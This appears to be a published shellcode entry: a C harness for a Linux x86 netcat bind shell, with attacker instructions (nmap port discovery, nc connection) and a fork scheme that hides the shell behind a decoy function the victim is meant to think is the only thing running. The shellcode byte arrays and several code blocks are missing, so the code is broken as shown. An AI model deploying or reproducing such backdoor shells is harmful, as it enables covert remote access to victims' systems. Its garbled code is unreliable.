Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)

Author: CripSlick Published: 2016-08-09 Verified: Verified



#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C "fork"
#include <stdlib.h> //| needed for C "system"
//| Exploit Title: [Linux x86 NetCat bind shell with Port (44, 52 bytes)]
//| Date: [7/28/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86]
//| Version: [NetCat v1.10-41]
//| OffSec ID: OS-20614
//|================================ CripSlick's Short NetCat Bind Shell ================================
//| Why use CripSlick's NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I highly
//| suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent,
//| multi-terminal with a password >>>>>>>>>>>>>>
//| Or if you must only rely on syscalls, go >>>>
//| for my bind shell that is also, persistent, multiterminal with a password (Ncat is better
//| due to SSL, so if you know the victim has it on their machine use it.)
//| Sometimes we don't have the luxury of being able to have the other goodies so you must make do 
//| with a less powerful approach to at least get your foot in the door, and that is why I made this.
//| Defender Bash Script   
//| netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
//| I came up with this bash script because I wanted to be able to see who was spying that included
//| TCP listening, TCP established, UDP listening, & UDP established.
//| I found it annoying that some people needed to run a new script for every state so I fixed that.
//| the "-A 50" means your bash script will hold up to 50 connections.
//| If you need more connections increase the number, and if the scan is slow, decrease the number.
#define PORT        "\x39\x38"  // FORWARD BYTE ORDER (ASCII TO HEX)
//|                 PORT:98        
//| Specifying the PROTOCOL Only Applies to CODE2
//#define PROTOCOL  "\x76\x76"  // TCP & IS terminal visible
#define PROTOCOL    "\x75\x75"  // UDP & NOT terminal visible  
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE1 Random Port, real ghetto but only 44 bytes!!
//| ==============================================================================
//| Attacker Finds Port: nmap -p-
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
unsigned char CODE1[] = //replace CODE1 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE2 with port and still only 52 bytes
//| ==============================================================================
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Attacker Connects via UDP: nc -u <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
unsigned char CODE2[] = //replace CODE2 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
//|========================== VOID SHELLCODE ======================================
//  This part floods the registers to make sure the shellcode will always run
    __asm__("mov $0xAAAAAAAA, %eax\n\t"
        "mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t"
        "mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t"
        "call CODE2");  //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
//|========================== VOID printBytes =====================================
void printBytes()
printf("CripSlick's code is %d Bytes Long\n",
        strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
//|============================== Int main ========================================
int main ()
//  IMPORTANT> replace CODEX  the "unsigned char" variable  above
//  > This needs to be done twice (for string count + code to use)
int pid = fork();       // fork start
    if(pid == 0){       // pid always starts at 0
    SHELLCODE();        // launch void SHELLCODE
                        // this is to represent a scenario where you bind to a good program
                        // you always want your shellcode to run first 
    }else if(pid > 0){   // pid will always be greater than 0 after the 1st process
                        // this argument will always be satisfied
    printBytes();       // launch printBYTES
                        // pretend that this is the one the victim thinks he is only using
return 0;               // satisfy int main
system("exit");         // keeps our shellcode a daemon. This only works with C0DE2 as UDP